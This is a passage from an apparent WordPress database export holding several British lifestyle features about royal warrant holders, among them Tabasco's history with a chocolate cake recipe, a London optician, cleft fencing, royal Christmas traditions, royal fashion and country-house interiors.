st_title=\"A splash of magic\" st_url=\"http://westonspirit.org.uk/2011/12/a-splash-of-magic/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>From Buckingham Palace to the foothills of the Himalayas, a famous pepper sauce has been bringing spice to life for more than 140 years</h4>&#13;\n<p>I n 2009 the McIlhenny Company, which makes Tabasco, was granted a royal warrant by the Queen, and became the only privately owned US food company to have achieved that honour.</p>&#13;\n<p>Tabasco Pepper Sauce was created by Edmund McIlhenny in 1868 on Avery Island, Louisiana, USA, and it is truly remarkable that this family recipe has remained unchanged to this day.</p>&#13;\n<p>Tabasco’s ingredient list is short and simple: crushed red tabasco peppers, a little salt from Avery Island’s own mine and high quality natural vinegar. The salted peppers are matured for three years in old bourbon whiskey barrels before being strained and mixed with the vinegar. The result is a traditional hot pepper sauce that teams heat with a distinctive flavour. When Edmund McIlhenny started commercial production Tabasco quickly became a runaway success. The first bottles reached Britain in 1874 and soon the McIlhenny family opened a London office to cope with the influx of orders.</p>&#13;\n<p>Through the years Tabasco has been enjoyed on expeditions to China; missions to the Sudan; and in the Himalayas to help spice up the rations of climbers attempting to climb Mount Everest. In 1922 the party excavating King Tutankhamun’s tomb included supplies of Tabasco on their provisions list. England’s love affair with Tabasco almost ended in 1932 when the sauce, a regular fixture on tables in the House of Commons dining rooms, was banned as part of a ‘buy British’ campaign. The resulting outcry from MPs was dubbed ‘the Tabasco tempest’ but the sauce soon resumed its rightful place on parliamentary tables.</p>&#13;\n<p>Today Paul McIlhenny, Edmund’s great grandson, oversees production of more than 150m bottles a year – still made on Avery Island to the original recipe – and the sauce is sold in more than 160 countries. As well as the original Tabasco Pepper Sauce, McIlhenny Co produces Tabasco Jalapeno Pepper Sauce, Tabasco Habanero Pepper Sauce and Tabasco Chipotle Pepper Sauce.</p>&#13;\n<p>As home cooks become more adventurous they are finding more ways to add a splash of Tabasco magic to their dishes. Use it as a subtle flavour enhancer in everything from braised meat to seafood, pasta and even desserts such as ice cream and chocolate cake. Why not try it for yourself and make the chocolate cake from the recipe given here?</p>&#13;\n<p>Once you’ve experienced the subtle, extra flavour that a few drops of Tabasco will unlock, you’ll always keep a bottle to hand – like those 1920s explorers and the kitchens of Buckingham Palace.</p>&#13;\n<div class=\"woo-sc-box normal   \">&#13;\n<h3><img class=\"alignright size-full wp-image-1141\" title=\"Tabasco Chocolate Cake 2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/Tabasco-Chocolate-Cake-2.jpg\" alt=\"\" />Tabasco Chocolate Cake</h3>&#13;\n<p><strong>Serves 8-10</strong></p>&#13;\n<p>250g plain flour</p>&#13;\n<p>350g demerara sugar</p>&#13;\n<p>65g plain cocoa powder</p>&#13;\n<p>1 tsp baking powder</p>&#13;\n<p>1 tsp salt</p>&#13;\n<p>250ml water</p>&#13;\n<p>2 tsp Tabasco Pepper Sauce</p>&#13;\n<p>240ml extra virgin olive oil</p>&#13;\n<p>1 tsp vanilla extract</p>&#13;\n<p>100g melted dark chocolate</p>&#13;\n<p><strong>Method</strong></p>&#13;\n<p>1. Preheat the oven to 180 C.</p>&#13;\n<p>2. In a large bowl, stir together the flour, sugar, cocoa powder, baking powder and salt. Pour in water, Tabasco, olive oil and vanilla and the dark chocolate; mix until combined.</p>&#13;\n<p>3. Place into an 8” loose bottomed lined cake tin.</p>&#13;\n<p>4. Bake for 45 minutes in the preheated oven (the surface will be matte) Allow to cool slightly, dust with cocoa powder and serve while still warm.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p>For more Tabasco recipes, visit <em><strong><a title=\"www.tabascofanclub.co.uk\" href=\"http://www.tabascofanclub.co.uk/\" target=\"_blank\">www.tabascofanclub.co.uk</a></strong></em></p>&#13;\n</div>&#13;\n<p> </p>&#13;\n									</div>','A splash of magic','545','publish','open','open','','a-splash-of-magic','','','2018-04-02 20:09:00','2018-04-02 20:09:00','',0,'http://westonspirit.org.uk/a-splash-of-magic.asp',0,'post','',0),(79,1,'2014-11-20 10:17:34','2014-11-20 10:17:34','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\"> </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"An appointment with excellence\" st_url=\"http://westonspirit.org.uk/2011/12/an-appointment-with-excellence/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"An appointment with excellence\" st_url=\"http://westonspirit.org.uk/2011/12/an-appointment-with-excellence/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"An appointment with excellence\" st_url=\"http://westonspirit.org.uk/2011/12/an-appointment-with-excellence/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"An appointment with excellence\" st_url=\"http://westonspirit.org.uk/2011/12/an-appointment-with-excellence/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"An appointment with excellence\" st_url=\"http://westonspirit.org.uk/2011/12/an-appointment-with-excellence/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>From much-loved traditional brands of food and cosmetics to software designers and window cleaners, the royal warrant is a proudly worn badge of distinction for companies of all kinds</h4>&#13;\n<p>As self-appointed wardrobe mistress to my grandmother I relished wintry Sunday afternoons organising her possessions. There was such pleasure to be had in lining up her perfectly proportioned court shoes and smart, boxy handbags. Silk head scarves had to be smoothed and folded, and bottles of English scent, which seemed quietly glamorous to a seven-year old, were replaced in their quaint boxes.</p>&#13;\n<p>Reading through the list of royal warrant holders to the Queen brought those childhood memories flooding back. Well-loved names such as Bronnley, Yardley London and Morny catch the eye, along with pantry favourites from Lea &amp; Perrins and Walkers Shortbread.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1131\" title=\"The President Of Turkey Abdullah Gul\'s State Visit To The UK\" src=\"/wp-content/uploads/2011/12/133919600-1.jpg\" alt=\"\" width=\"300\" height=\"444\" /></p>&#13;\n<p>But the list of those holding warrants is about more than pleasant incidentals. More than 800 companies hold this badge of distinction, which is also granted by the Duke of Edinburgh and Prince Charles, and the list reflects the needs and interests of their many households. So horse food manufacturers and dry cleaners sit alongside suppliers of computer software and window cleaners. Saddlers and coach makers keep company with major names in motor manufacture. All have the right to display the legend “By Appointment” on their products, premises and advertising.</p>&#13;\n<p>The noun “warrant” is a medieval corruption of “guarantee”. Having the right to display the grantor’s coat of arms for five years signifies that the royal family prefers to deal with that company because they have confidence in what the company offers. And they are confident not just about the product but about the environmental and corporate social responsibility commitments behind it.</p>&#13;\n<p>Whatever the size of the company, the warrant goes to an individual – an owner or managing director – who has personal responsibility to ensure best quality service.</p>&#13;\n<p>Buying a slice of the royal lifestyle is occasionally within our reach and many are tempted, as our fashion feature shows.</p>&#13;\n<p>The list of royal warrant holders is usually taken as an indication of the “family firm’s” shopping preferences. Her Majesty seems to have fairly simple tastes, as former BBC royal correspondent Jennie Bond discusses when she reveals what happened the time she took tea with the.</p>&#13;\n<p>No doubt some royal warrant holders will be called upon to prepare for the Queen’s diamond jubilee celebrations in June 2017. The Royal Warrant Holders Association will be marking the occasion with an endowment scheme to double the number of craftspeople supported by its charitable arm, the Queen Elizabeth Scholarship Trust. We look at its impact on our heritage.</p>&#13;\n<p>A sense of tradition can be reassuring at a time of upheaval and hardship, and as our insight into the festive celebrations of the royals reveals, we are increasingly mirroring them by turning to the tried and trusted this season. Just as we can all shop with the royals’ preferred suppliers, we can basically enjoy the same sort of Christmas.</p>&#13;\n			  </div>','An appointment with excellence','495','publish','open','open','','an-appointment-with-excellence','','','2018-04-02 20:08:58','2018-04-02 20:08:58','',0,'http://westonspirit.org.uk/an-appointment-with-excellence.asp',0,'post','',0),(80,1,'2014-04-19 19:23:08','2014-04-19 19:23:08','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 December 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"An eye for tradition\" st_url=\"http://westonspirit.org.uk/2011/12/an-eye-for-tradition/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"An eye for tradition\" st_url=\"http://westonspirit.org.uk/2011/12/an-eye-for-tradition/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"An eye for tradition\" st_url=\"http://westonspirit.org.uk/2011/12/an-eye-for-tradition/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"An eye for tradition\" st_url=\"http://westonspirit.org.uk/2011/12/an-eye-for-tradition/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"An eye for tradition\" st_url=\"http://westonspirit.org.uk/2011/12/an-eye-for-tradition/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Independent optician has not lost sight of the importance of offering a high quality, traditional, service to all its customers</h4>&#13;\n<p>Traditional standards of quality and service combined with the most advanced eyewear – these are the hallmarks of independent optician Roger Pope and Partners in central London.</p>&#13;\n<p>This is a bespoke service, as favoured by leading ophthalmologists in the Harley Street area, which brings the finest spectacles to the most discerning clients.</p>&#13;\n<p><img class=\"alignright size-medium wp-image-1189\" title=\"Lindberg from Roger Pope\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/Lindberg-from-Roger-Pope-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /></p>&#13;\n<p>Roger Pope and Partners hold a royal warrant by appointment to Her Majesty the Queen, and in addition – through its discreet service – supplies eyewear to people from all walks of life who seek quality of care and an excellent product range.</p>&#13;\n<p>Following an advanced eye examination using the latest technology, including OCT 3D imaging of the back of the eye, patients are guided through an extensive choice of inspiring eyewear, including bespoke buffalo horn, solid gold frames – both with or without jewels – and many internationally sourced designer collections.</p>&#13;\n<p>The frames are then fitted with the most advanced lenses in the practice’s in-house laboratory, with the emphasis always very much on providing a personal and individual service.</p>&#13;\n<p>For the world of sportsmen and women, the practice dispenses specialist eyewear for golfers, sailing enthusiasts, cyclists and others who need to be assured of good vision in all conditions for their particular passion.</p>&#13;\n<p>Traditional standards of service, quality of care and a friendly welcome are guaranteed at Roger Pope and Partners in New Cavendish Street, London W1.</p>&#13;\n<div class=\"woo-sc-box normal   \"><strong><a title=\"www.rogerpope.co.uk\" href=\"http://www.rogerpope.co.uk/\" target=\"_blank\">www.rogerpope.co.uk</a></strong></div>&#13;\n<p> </p>&#13;\n									</div>','An eye for tradition','253','publish','open','open','','an-eye-for-tradition','','','2018-04-02 20:08:57','2018-04-02 20:08:57','',0,'http://westonspirit.org.uk/an-eye-for-tradition.asp',0,'post','',0),(81,1,'2017-03-09 07:52:24','2017-03-09 07:52:24','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 December 2016</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Bringing history to life\" st_url=\"http://westonspirit.org.uk/2011/12/bringing-history-to-life/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Bringing history to life\" st_url=\"http://westonspirit.org.uk/2011/12/bringing-history-to-life/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Bringing history to life\" st_url=\"http://westonspirit.org.uk/2011/12/bringing-history-to-life/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Bringing history to life\" st_url=\"http://westonspirit.org.uk/2011/12/bringing-history-to-life/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Bringing history to life\" st_url=\"http://westonspirit.org.uk/2011/12/bringing-history-to-life/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>One company is keeping the ancient art of cleft fencing alive – demonstrating skills and techniques that have stood the test of time</h4>&#13;\n<p>Cleft fencing is a craft that dates back to Roman times, but by the end of the 20th century it was becoming a dying art.</p>&#13;\n<p>Inspired by a book written by Cambridge botanist Oliver Rackham, retired cavalry officer Major Richard Bower decided to breathe new life into cleaving to recreate the Arcadian framework of the English countryside.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1193\" title=\"111014_WZFencing_11\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/111014_WZFencing_11.jpg\" alt=\"\" width=\"300\" height=\"450\" />Twenty-five years later, in the corner of a Dorset field, three men working for Bower’s Winterborne Zelston Fencing use axes, hammers and wedges to split an oak tree cut to length.</p>&#13;\n<p>The outer bark and the pith are stripped away to leave the heart of oak. Then, the remaining piece of wood is balanced on a wooden frame called a brake and split down its length using a tool called a froe. The blade works along the grain and the line of least resistance in the wood. This is delicate work which requires a craftsman’s experienced hand.</p>&#13;\n<p>“Every piece of timber is different, which means that every day you are learning something new,” says Garry Lewis, 37, who received his on-the-job training thanks to the Queen Elizabeth Scholarship Trust, the charitable arm of the Royal Warrant Holders Association.</p>&#13;\n<p>Winterborne Zelston Fencing makes the posts, pales, rails and shingles, and its workers also erect the cleft fences, which slot together without nails. The untreated oak is waterproof and will withstand the elements for a long time.</p>&#13;\n<p>Cleft fencing caught Prince Charles’s eye when he saw Bower’s stand, “The World of Cleft”, at the Royal Show and he asked the company to put its skills to work at his Gloucestershire home, Highgrove House. After several projects on the estate including fencing, a chicken run and supplying the oak for a pergola, the prince offered Bower the royal warrant in 1999.</p>&#13;\n<p>“He used to come out and we’d talk,” he says. “He was marvellous and one day he said he would like me to have the royal warrant.</p>&#13;\n<p>“Being a warrant holder encourages you to maintain a high standard of top-class work– that’s the whole point.”</p>&#13;\n<div class=\"woo-sc-box normal   \"><em>For more information, call <strong>Major Richard Bower</strong> on <strong>01929 549245</strong> or email <strong>wzfencing@btinternet.com</strong></em></div>&#13;\n<p> </p>&#13;\n									</div>','Bringing history to life','373','publish','open','open','','bringing-history-to-life','','','2018-04-02 20:08:55','2018-04-02 20:08:55','',0,'http://westonspirit.org.uk/bringing-history-to-life.asp',0,'post','',0),(82,1,'2017-11-28 17:03:47','2017-11-28 17:03:47','<div class=\"entry\">\r\n<h4>In an age of austerity, Christmas traditions, many of them inspired by previous generations of royals, become ever more comforting</h4>\r\n&nbsp;\r\n\r\nAs families around Britain are contemplating how to orchestrate their Christmas get-togethers, it seems that the Windsors, who usually celebrate at Sandringham, the Queen’s Norfolk retreat, have similar concerns.\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignright size-full wp-image-1172\" title=\"97002891\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/97002891.jpg\" alt=\"\" width=\"300\" height=\"366\" />“Her Majesty looks forward to the festivities immensely, this being the only time of the busy royal year that all four of her children, their spouses and most of her grandchildren are under the same roof for a few days,” says Joe Little, managing editor of Majesty magazine.\r\n\r\n&nbsp;\r\n\r\nAnd, according to The Royal Encyclopaedia, the authorised book on the royals, Christmas Day with the Windsors is fairly similar to that spent by families around the country. After church and lunch they sit down together to watch the Queen’s Christmas broadcast.\r\n\r\n&nbsp;\r\n\r\nAs austerity bites deeper, more of us are expected to turn to the comforting thoughts of a traditional Christmas. Queen Victoria’s family set the style of our celebrations: the children were known to make Christmas cards while Prince Albert popularised decorated trees and drove his wife around the grounds of Windsor Castle in a horse-drawn sleigh (although Queen Charlotte, consort of King George III, may have stolen his thunder as she is also credited with introducing Christmas trees to the royal family).\r\n\r\n&nbsp;\r\n\r\nRoyal warrant holders are also picking up on our yearning for times past.\r\n\r\n&nbsp;\r\n\r\n“This year it certainly seems that people want nostalgia,” says Jenifer Emery, director of florist Edward Goodyear. “In difficult times people feel more secure with a traditional Christmas, which includes Victorian themes.”\r\n\r\n&nbsp;\r\n\r\nThe feeling is manifesting itself in this year’s trend for garlands of foliage on our mantelpieces and banisters, featuring cinnamon sticks and dried roses. And we are turning to those old favourites, oranges and cloves to scent our homes, says Emery.\r\n\r\n&nbsp;\r\n\r\n<img class=\"alignleft size-full wp-image-1171\" title=\"92831317\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/92831317.jpg\" alt=\"\" width=\"300\" height=\"360\" />Our search for a guaranteed feel-good factor is also reflected in our gift-buying, says Caroline Stacpoole, owner of the General Trading Company.\r\n\r\n&nbsp;\r\n\r\n“So far we’ve seen that our customers are buying and looking for more traditional gifts for the family, home and pets,” she says, adding that retro-style toys, such as a sit-on-and-ride car, are proving popular.\r\n\r\n&nbsp;\r\n\r\nAt radio specialists Roberts, marketing director Owen Waters says that its 1950s-theme Revival radio continues to win fans. And nostalgia will also influence how we dress to celebrate this Christmas, says Genevieve Lawson, design director of accessories specialist Cornelia James.\r\n\r\n&nbsp;\r\n\r\n“The British are embracing the timeless qualities of classic style and heritage glamour,” she says, adding that evening gloves and faux fur shrugs are proving popular.\r\n\r\n&nbsp;\r\n\r\nNot that people are going out as much. “Everyone is looking to the hearth and home,” says Annie Quigley, director of mail order book company Bibliophile. “And people are looking for ideas for homemade gifts, such as chutneys and preserves.”\r\n\r\n&nbsp;\r\n\r\nAt cheesemongers Paxton &amp; Whitfield managing director Ros Windsor finds that trusted favourites are popular this year.\r\n\r\n&nbsp;\r\n\r\n“We’ve seen that our customers are asking about more traditional cheeses such as great artisan examples of Stilton and Cheddar,” she says. “This is what they have grown up eating at Christmas and they like to continue this tradition.”\r\n\r\n&nbsp;\r\n\r\nNostalgia, Christmas and royal custom are being rolled into a new truffle at chocolate manufacturer Charbonnel et Walker which has linked up with wine merchants Berry Bros &amp; Rudd to create a truffle infused with the King’s Ginger, a liqueur formulated for King Edward VII in 1909.\r\n\r\n&nbsp;\r\n\r\n“It has appealed to customers as it is a collaboration between two long-established brands and warrant holders,” says Victoria Leadbitter of Charbonnel et Walker.\r\n\r\n&nbsp;\r\n\r\nFrom Christmas trees to chocolates, the great British Christmas remains a nostalgic, royal-inspired affair.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>','Merry glow of times past','610','publish','open','open','','merry-glow-of-times-past','','','2018-04-02 20:39:12','2018-04-02 20:39:12','',0,'http://westonspirit.org.uk/merry-glow-of-times-past.asp',0,'post','',0),(83,1,'2018-02-18 09:55:19','2018-02-18 09:55:19','<div class=\"entry\">&#13;\n                  <div class=\"sharethis_top_bar\">&#13;\n  <span class=\"st_email_hcount\" st_title=\"Modern classics wear well\" st_url=\"http://westonspirit.org.uk/2011/12/modern-classics-wear-well/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Modern classics wear well\" st_url=\"http://westonspirit.org.uk/2011/12/modern-classics-wear-well/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Modern classics wear well\" st_url=\"http://westonspirit.org.uk/2011/12/modern-classics-wear-well/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Modern classics wear well\" st_url=\"http://westonspirit.org.uk/2011/12/modern-classics-wear-well/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Modern classics wear well\" st_url=\"http://westonspirit.org.uk/2011/12/modern-classics-wear-well/\" displaytext=\"plusone\"></span></div>&#13;\n                	                	                	<h4>Safe, solid and dependable, the style of the House of Windsor seems far removed from the fast-moving world of fashion, but it has more influence that one might think</h4>&#13;\n<p>The Queen’s classic approach is her hallmark, Prince Charles has admitted that he changes his style only once every 25 years and Princess Anne is well-known as a fashion recycler, not worried about pulling out old favourites from the back of her dressing room. And the Duchess of Cambridge has been known to follow their example.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1167\" title=\"Royal Wedding - Carriage Procession To Buckingham Palace And Departures\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/113270184.jpg\" alt=\"\" width=\"300\" height=\"458\" /></p>&#13;\n<p>Despite this play-safe approach, the royals – and the Queen in particular – have a major impact on what we wear.</p>&#13;\n<p>Consider the wedding of Prince William and Catherine Middleton in April. While the fashion press heaped praise on the wedding dress designed by Sarah Burton of Alexander McQueen, the Queen was making more gentle waves of her own.</p>&#13;\n<p>Bizarrely, it was not her stylish lemon outfit that got Her Majesty noticed she donned to take a closer look at the proceedings. The story behind the pale pink plastic frames puts the influence of the House of Windsor into sharper focus.</p>&#13;\n<p>High-street opticians say that for months, egged on by female customers, they had been asking Silhouette – the Austrian makers of the plastic frames worn by the Queen – to reverse its decision to phase them out as it moved towards metal and frameless styles.</p>&#13;\n<p>“After the wedding we had customers asking for the same frames as the Queen; apparently women in America went mad for them too,” say opticians at Tolley &amp; Partners in south-west London.</p>&#13;\n<p>“Although the exact ones are not offered to the public there are very similar ones available,” says a spokeswoman for Silhouette. In response to demand the plastic range is being expanded and will be relaunched next year, she adds.</p>&#13;\n<p>Royal bag-makers Launer also saw a huge spike in orders, which went up by 60 per cent, and demand from across the world caused their internet site to crash after the Queen carried a boxy, cream calf-leather handbag made especially for the occasion.</p><div class=\"woo-sc-quote\"><p> We have women much younger than the Queen who like the way she looks and want a little bit of it</p></div>&#13;\n<p>“We don’t speak to the Queen directly but we know that she takes a great interest in the design of her handbags and the materials that we use. She prescribed the exact lining she wanted for the royal wedding bag,” says David Bayes, Launer’s spokesman. The Queen has a definite view of her style says royal couturier Maureen Rose, who worked for Her Majesty for 20 years with designer Ian Thomas and then took over on his death in 1993.</p>&#13;\n<p>“I remember trying to make a coat three-quarters of an inch longer and the Queen noticed immediately. I explained that I thought it would make the outfit more balanced and she tried it on. At the end of the fitting she looked at me and said ‘I think we will go back to the original length, don’t you?’</p>&#13;\n<p>“The Queen would never see herself as a fashion icon. She wears what I consider to be classic clothes in good quality materials that you can bring out year after year,” says Rose, who retired in 2003 and now makes wedding dresses at her home in Hampshire.</p>&#13;\n<p></p><div id=\"attachment_1168\" class=\"wp-caption alignleft\" style=\"width: 177px\"><img class=\"size-full wp-image-1168\" title=\"Parvin m-credit Stuart Conway\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/Parvin-m-credit-Stuart-Conway-e1322830972493.jpg\" alt=\"\" width=\"167\" height=\"290\" /><p class=\"wp-caption-text\">Parvin : Queen influences fashion</p></div>&#13;\n<p>In recent years, however, the Queen’s style has changed slightly under the influence of Stewart Parvin, 45, who owns a couture boutique in Belgravia and started working with the Queen in 2000 in preparation for the golden jubilee in 2002.</p>&#13;\n<p>“I was approached and asked to submit designs and fabrics for a brief – at that time I did not know that they were for the Queen. She liked my work and I was invited to be the person who would update her image.”</p>&#13;\n<p>The designs she most liked – and the most successful – turned out to be variations on the ones that had won him plaudits with his private clients. “Although I design formal clothes, they are not as formal as some other people’s. For the Queen it remains classic elegance but with a sharp and modern twist, appropriate to her age and duties.”</p>&#13;\n<p>He says that the Queen does have an influence on fashion. “We have women much younger than the Queen who like the way she looks and want a little bit of it. We have people coming to us wanting a similar type of fashion because, for a woman of her age, she dresses 20 years younger than she is but still appropriately,” he says.</p>&#13;\n<p></p><div id=\"attachment_1169\" class=\"wp-caption alignright\" style=\"width: 280px\"><img class=\"size-full wp-image-1169 \" title=\"Beaufort jacket\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/Beaufort-jacket.jpg\" alt=\"\" width=\"270\" height=\"342\" /><p class=\"wp-caption-text\">Royal influence: Popular Barbour Beaufort Jacket</p></div>&#13;\n<p>But the fashion influence of the House of Windsor extends far beyond the wealthy. Queen Victoria, whose wedding dress is said to have saved the British lace-making industry, popularised tartan plaid and set the tone for children’s wear. A permanent exhibition opening next March at Kensington Palace – Victoria Revealed – will display a sailor suit, believed to have been worn by Prince Bertie, Queen Victoria’s second child who was crowned King Edward VII in 1901.</p>&#13;\n<p>“Soon, little boys all over the world were wearing sailor suits and they became the foundation for school uniforms,” says Joanna Marschner, senior curator of Historic Royal Palaces.</p>&#13;\n<p>The House of Windsor is also known for its outdoor style of waxed and padded jackets which have become hip in unlikely urban settings and on university campuses.</p>&#13;\n<p>Classic styles by heritage brands, such as Burberry, Barbour, Aquascutum and Wolsey ignite interest from each new generation, says Tom Bottomley, the deputy editor of Menswear Buyer magazine.</p>&#13;\n<p>“A cool kid from Shoreditch puts on a waxed Barbour jacket and wears it with skinny-fit chinos and beaten up brogues, and all of a sudden it looks very different to the country set with labradors on leads.”</p>&#13;\n<p>Barbour holds three royal warrants and Gary Burnand, director of global marketing, praises the Royal Family’s “timeless, effortless style which is always appropriate to the occasion.” He adds that the importance of the royal seal of approval should not be underestimated, even when it’s only implied.</p>&#13;\n<p>“When the film The Queen opened in New York, our store in Madison Avenue was inundated with customers asking if they could buy the Beaufort jacket that Helen Mirren wore in the film. Sales of the Beaufort doubled overnight.”</p>&#13;\n									</div>','Modern classics wear well','1054','publish','open','open','','modern-classics-wear-well','','','2018-04-02 20:08:52','2018-04-02 20:08:52','',0,'http://westonspirit.org.uk/modern-classics-wear-well.asp',0,'post','',0),(84,1,'2014-10-07 19:33:20','2014-10-07 19:33:20','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 December 2016</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> rmullen\" title=\"Posts by Rosalind Mullen\" rel=\"author\"&gt;Rosalind Mullen</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Pump up the pomp\" st_url=\"http://westonspirit.org.uk/2011/12/pump-up-the-pomp/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Pump up the pomp\" st_url=\"http://westonspirit.org.uk/2011/12/pump-up-the-pomp/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Pump up the pomp\" st_url=\"http://westonspirit.org.uk/2011/12/pump-up-the-pomp/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Pump up the pomp\" st_url=\"http://westonspirit.org.uk/2011/12/pump-up-the-pomp/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Pump up the pomp\" st_url=\"http://westonspirit.org.uk/2011/12/pump-up-the-pomp/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>From flock wallpaper to swags and tassels, we like to sneak a bit of British upper-class sophistication into our homes. The secret is doing it in style</h4>&#13;\n<p>Grand houses dominate our television screens and our consciousness; from Downton Abbey to the BBC’s The Queen’s Palaces via Country House Rescue, we love to debate the merits of their decor and architecture and incorporate them in our homes. And as we bounce from the royal wedding to the Queen’s diamond jubilee in 2017, our taste for pomp and gold leaf will become stronger.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1176\" title=\"LLB Nov 11\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/LLB-Nov-11.jpg\" alt=\"\" width=\"240\" height=\"316\" />“We’re in the middle of Anglomania,” says TV style guru Laurence Llewelyn- Bowen. “Our love affair with all things royal is cyclical – sometimes we think it’s very chic and other times we run screaming from it. The royal wedding ignited our ardour. We have an energetic young couple who will do a good job and we’re trying to reflect that glory in our homes.”</p>&#13;\n<p>Rhoda Parry, editor of Country Homes &amp; Interiors, reckons it’s more entrenched than that; a recent reader survey in the magazine voted the English country house style as top, trouncing cottage, Scandinavian, vintage, New England and French styles.</p>&#13;\n<p>“Today, this look is about casual, elegant country homes where children and dogs can flop on sofas and where cutting-edge technology sits alongside inherited furniture,” says Parry.</p><div class=\"woo-sc-quote\"><p> Our love affair with all things royal is cyclical – sometimes we think it’s very chic and other times we run screaming from it</p></div>&#13;\n<p>John Goodall, architectural editor at Country Life, says today’s style is eclectic.</p>&#13;\n<p>“Those who inherit a stately home tend to soften the historic environment and nod to travel and modern tastes by adding a few ethnic pieces,” he says.</p>&#13;\n<p><img class=\"alignleft size-full wp-image-1177\" title=\"115946005\" src=\"http://westonspirit.org.uk/wp-content/uploads/2011/12/115946005.jpg\" alt=\"\" width=\"343\" height=\"312\" />He adds that even in the grandest homes kitchens are increasingly used as living spaces rather than being just functional, and once-draughty and uninviting bathrooms tend now to be clean, modernist, minimalist and well-lit “with polished stone, mirrors, space and lots of towels”.</p>&#13;\n<p>So if the gentry aren’t standing still, why should we?</p>&#13;\n<p>“When [architect] Robert Adam was around [in the 1700s] he was cutting-edge, so you have to be careful not to stagnate,” says TV property expert Sarah Beeny, who refurbished Georgian gem Rise Hall in Channel 4’s Beeny’s Restoration Nightmare.</p>&#13;\n<p>“What’s exciting nowadays is to have a classic design with a modern twist.”</p>&#13;\n<p>The good news, therefore, is that for those of us devoid of a stately pile, there’s plenty of scope for playfulness. Llewelyn-Bowen advises us to be tasteful, but enjoy it – to flirt with ornate picture frames and relish the fact that must-have furniture now has gold twiddly bits and garish cut velvet.</p>&#13;\n<p>It’s easy to follow up this inspiration with royal warrant holders who may supply furnishings and fittings fit for the Queen, but whose products are accessible to everyone.</p>&#13;\n<p>Yorkshire-based Hainsworth, for example, is known for its ceremonial cloth and textiles –including curtains for Windsor Castle – but it also has a range of hand-finished John Atkinson blankets, which it claims have adorned royal beds across Europe, available through stores such as John Lewis.</p>&#13;\n<p>“Having a royal warrant sets you apart. You can’t buy the sort of cachet that royalty has…and they like the best stuff,” says commercial director Adam Hainsworth, the seventh generation of the family firm.</p>&#13;\n<p>And at All About Baths in Edinburgh – which owner David Gallacher reckons serves everyone from the council to Balmoral – original roll-top baths are sold and refurbished. The family company banishes chips and rust and offers re-polishing service.</p>&#13;\n<p>“You hear horror stories of re-enamelling peeling off,” says Gallacher. “We use the original surface so it 